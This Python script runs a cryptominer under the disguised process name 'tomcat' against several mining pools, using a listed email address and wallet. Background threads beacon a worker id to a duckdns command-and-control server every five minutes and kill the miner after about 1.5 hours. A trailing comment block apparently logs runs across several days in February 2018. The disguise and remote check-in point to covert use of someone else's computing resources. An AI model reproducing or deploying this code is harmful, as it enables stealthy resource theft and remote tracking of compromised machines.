import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:41:06.130879
#2018-02-17 17:29:05.185698
#2018-02-17 19:18:05.304121
#2018-02-17 21:09:05.041965
#2018-02-17 22:53:05.412042
#2018-02-18 00:38:01.423642
#2018-02-18 02:28:06.143190
#2018-02-18 04:15:06.720177
#2018-02-18 06:07:07.139686
#2018-02-18 07:56:04.563840
#2018-02-18 09:44:04.202089
#2018-02-18 11:31:01.700227
#2018-02-18 13:17:05.427689
#2018-02-18 15:07:04.878201
#2018-02-18 16:54:03.262971
#2018-02-18 18:43:04.078354
#2018-02-18 20:29:05.845022
#2018-02-18 22:15:07.580231
#2018-02-19 00:04:03.815788
#2018-02-19 01:51:02.142835
#2018-02-19 03:38:04.479156
#2018-02-19 05:23:03.395236
#2018-02-19 07:11:04.554111
#2018-02-19 08:58:07.512915
#2018-02-19 10:47:01.833078
#2018-02-19 12:34:08.639450
#2018-02-19 14:23:04.701427
#2018-02-19 16:13:07.136282
#2018-02-19 18:00:01.648540
#2018-02-19 19:46:07.126299
#2018-02-19 21:34:03.674828
#2018-02-19 23:20:07.583133
#2018-02-20 01:07:01.584931
#2018-02-20 02:56:02.165023
#2018-02-20 04:45:01.585457
#2018-02-20 06:29:03.794070
#2018-02-20 08:13:06.920994
#2018-02-20 09:59:01.337668
#2018-02-20 11:42:09.117986
#2018-02-20 13:31:01.760731
#2018-02-20 15:15:10.409993
#2018-02-20 17:01:01.892939
#2018-02-20 18:49:04.658767
#2018-02-20 20:41:04.554484
#2018-02-20 22:25:05.504893
#2018-02-21 00:06:03.992352
#2018-02-21 01:53:04.046783
#2018-02-21 03:42:06.495848
#2018-02-21 05:29:04.975153
#2018-02-21 07:17:03.743322
#2018-02-21 09:01:08.151102
#2018-02-21 10:50:06.975943
#2018-02-21 12:36:07.231103
#2018-02-21 14:24:08.248427
#2018-02-21 16:11:12.497086
#2018-02-21 18:01:06.389194
#2018-02-21 19:48:10.044368
#2018-02-21 21:34:09.303057
#2018-02-21 23:21:04.081195
#2018-02-22 01:10:08.958547
#2018-02-22 02:57:04.264118
#2018-02-22 04:44:08.431752
#2018-02-22 06:29:05.826104
#2018-02-22 08:16:07.611227
#2018-02-22 10:05:01.431974
#2018-02-22 11:49:12.125130
#2018-02-22 13:35:12.758644
#2018-02-22 15:24:01.654510
#2018-02-22 17:11:08.292605
#2018-02-22 18:58:01.831187
#2018-02-22 20:50:09.276644
#2018-02-22 22:35:08.422725
#2018-02-23 00:22:01.436361
#2018-02-23 02:09:06.656130
#2018-02-23 03:57:07.118112
#2018-02-23 05:45:01.584807
#2018-02-23 07:33:03.411529
#2018-02-23 09:36:04.455613
#2018-02-23 11:40:11.229186
#2018-02-23 13:32:01.805254
#2018-02-23 15:19:01.847579
#2018-02-23 17:06:05.121666
#2018-02-23 18:36:02.012417
#2018-02-23 20:17:06.465475
#2018-02-23 21:53:03.628739
#2018-02-23 23:31:06.301514
#2018-02-24 01:04:02.211648
#2018-02-24 02:46:05.084433
#2018-02-24 04:22:07.347423
#2018-02-24 05:50:04.637966
#2018-02-24 07:28:05.455995
#2018-02-24 09:02:02.057039
#2018-02-24 10:46:01.732272
#2018-02-24 12:33:06.095010
#2018-02-24 14:21:05.454239
#2018-02-24 16:08:06.836390
#2018-02-24 17:59:01.660976
#2018-02-24 19:47:04.769602
#2018-02-24 21:32:05.355858
#2018-02-25 00:19:01.606566
#2018-02-25 04:14:03.676481
#2018-02-25 07:44:07.702321